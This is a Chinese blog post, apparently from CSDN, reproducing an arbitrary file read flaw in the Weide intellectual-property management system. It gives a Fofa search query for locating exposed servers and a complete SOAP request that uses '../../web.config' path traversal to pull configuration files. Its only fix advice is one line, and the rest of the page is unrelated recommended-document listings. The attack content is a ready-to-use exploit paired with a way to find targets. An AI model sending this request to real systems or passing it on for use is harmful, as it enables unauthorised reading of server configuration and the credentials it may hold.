唯徳知识产权管理系统 UploadFileWordTemplate 任意文件读取

于 2024-09-15 14:30:35 发布
阅读量141 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142283765
版权

0x01 漏洞描述:

唯徳于2014年成立,是专业提供企业、代理机构知识产权管理软件供应商,某公司凭借领先的技术实力和深厚的专利行业积累,产品自上市推广以来,已为1000多家企业及代理机构提供持续稳定的软件服务。其知识产权系统DownloadFileWord**存在任意文件读取漏洞

0x02 搜索语句:

Fofa:body="JSCOMM/language.js"

0x03 漏洞复现:

POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <DownloadFileWordTemplate xmlns="http://tempuri.org/">
      <fileName>../../web.config</fileName>
    </DownloadFileWordTemplate>
  </soap:Body>
</soap:Envelope>

读取web.conf后响应体数据做了base64编码 解码后数据如下

0x04 修复建议:

厂商已发布补丁请及时修复

iSee857
关注
专栏目录
知识产权管理系统解决方案.docx
04-27
知识产权管理系统解决方案 知识产权管理系统解决方案是指通过信息化手段对知识产权进行有效管理、保护和利用的系统解决方案。该解决方案旨在帮助企业和个人更好地管理和保护自己的知识产权,防止知识产权侵权和盗窃...
德学教学课件.ppt
12-08
"温故而知新"源自《论语》,意味着通过回顾旧知识来获取新理解。"见人善即思齐"是指看到别人的优点和善行,应以此为榜样,努力向其看齐。"纵去远以渐跻"表示即使目标遥不可及,也要逐步努力接近,体现出持之以恒的...
弟子规知识竞赛试题及答案.doc
09-10
【弟子规知识竞赛试题及答案解析】 《弟子规》是中国传统文化中的一部经典教育读物,由清代学者李毓秀编撰,旨在教导孩子们基本的道德规范和生活礼仪。这部著作经历了许多版本的修订,其中贾有仁和贾存仁的名字都与...
2019年水彩笔创业组-微德有限责任公司PPT+项目介绍视频_微德有限责任公司.ppt
04-29
2019年水彩笔创业组-微德有限责任公司PPT+项目介绍视频_微德有限责任公司.ppt
初中校长个人述职报告.docx
10-07
【标题】和【描述】提到的是初中校长的个人述职报告,这份报告主要涵盖了校长在过去一段时间内的工作内容、管理理念和学校发展情况。【标签】强调了这是关于述职报告的word文档资料。 校长在报告中首先强调了自身的...
人力资源部的口号简短.pdf
02-11
【人力资源管理核心理念】 在人力资源管理中,企业的口号和标语往往体现了其对人才的重视程度和管理策略。以下是一些核心的理念和原则: 1. **人才资产化**:将人才视为企业的核心资产,强调对人才的经营和管理,...
表达朋友间情谊的诗句大全.doc
12-27
虽然没有提供具体文件内容,但我们可以从给出的部分诗句中了解到,这些诗句表达了人们对友情深厚的感情,以及对故人思念之情。 在这些诗句中,我们可以提取出以下几个关于朋友间情谊的知识点: 1. **深厚的友情**...
精品工作总结范文模板-2017年公司年终总结暨表彰大会主持词.docx
04-29
根据给定的文件信息,我们可以从中提取出以下关键知识点: ### 1. 年终总结暨表彰大会的目的 - **回顾总结**:大会的主要目的是为了回顾过去一年的工作情况,总结经验,吸取教训。 - **表彰先进**:通过表彰在工作...
部编语文一至六年级日积月累.doc
06-01
【知识点详解】 1. 诗词鉴赏:文档中包含了多个著名古诗词,如骆宾王的《咏鹅》,李绅的《悯农》(其二),李白的《古朗月行》(节选),孟浩然的《春晓》,贾岛的《寻隐者不遇》,唐寅的《画鸡》等,这些都是部编语文...
创业期企业的人才选拔与使用.doc
09-26
例如,财务管理岗位可能更注重稳定性与道德品质,而市场营销可能更看重创新和适应性。创业期企业尤其需要具备以下特质的人才: 1. 行业和职务所需的基本知识:这是人才能够胜任工作的基础,通过培训可以进一步提升...
高中历史第二单元从周王朝到秦帝国的崛起第4课封邦建国与礼乐文化优质课件1华东师大版第二册
09-09
高中历史课程中的“封邦建国与礼乐文化”这一主题主要涵盖了西周的建立、封邦建国体制以及礼乐制度这三个重要知识点。 首先,西周的建立是在公元前1046年,通过武王伐纣的战役,推翻了商朝的统治。这一事件标志着...
部编人教版二年级语文上册期中考试题.docx
11-22
【知识点解析】 1. **词语搭配与补充**:题目中涉及了多个词语的搭配和补充,这是二年级语文学习中的重要部分,旨在培养学生的词汇积累和语言表达能力。例如:“______的阳光”、“______的细雨”等,需要学生根据...
2017年公司年终总结暨表彰大会主持词.pdf
最新发布
01-28
【企业文化】会议中提及的“诚信做人,踏实干事”、“德,正道而行”以及“扎根社区,服务邻居”的经营理念,反映了公司的核心价值观和企业文化,这是塑造企业形象,引导员工行为的重要指南。 【发展目标】...
二年级下册语文部编版期末模拟卷1(含答案).pdf
04-26
这份二年级下册语文部编版期末模拟试题的知识点主要涵盖了拼音识字、词语辨析、语境用词、句子构造、阅读理解等方面。以下是对各个部分知识点的详细介绍: 一、拼音和词语应用 在这一部分,学生需要根据拼音写出...
2017年公司年终总结暨表彰大会主持词.docx
09-12
【公司理念】会议强调了公司“诚信做人,踏实干事”、“德,正道而行”和“扎根社区,服务邻居”的经营理念,以及“对社会负责,让员工富裕”的发展方针,体现了公司的社会责任和员工关怀。 【后续行动】会后...
创业者自我营销与团队建设.pptx
10-13
根据《Winning Angels by Stevenson & Amis, 2001》中的观点,创业者需要具备专业知识、经营管理能力以及强烈的人格魅力、动机和企图心。 创业者自我营销是指通过展示自身的品质、理念和能力来吸引投资者和合作伙伴...
学习中华传统文化心得体会范文.pdf
12-07
其次,作者思考了“德学,才艺,不如人,当自砺”的道理,意识到自己过去的顽固和自满,总是认为自己不如别人,结果没有上进心。作者学习了《弟子规》后,意识到自己应该努力充实自己,不要总是比较自己和别人,...
[案例]套电梯项目商业计划书[策划&调研].docx
11-05
以下是该商业计划书的知识点摘要: 1. 商业计划书基本结构:商业计划书由项目基本情况、环境保护、投资与融资、项目评价等部分组成。 2. 项目基本情况:套电梯投资建设项目位于XXX经济技术开发区,总投资10901.73...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值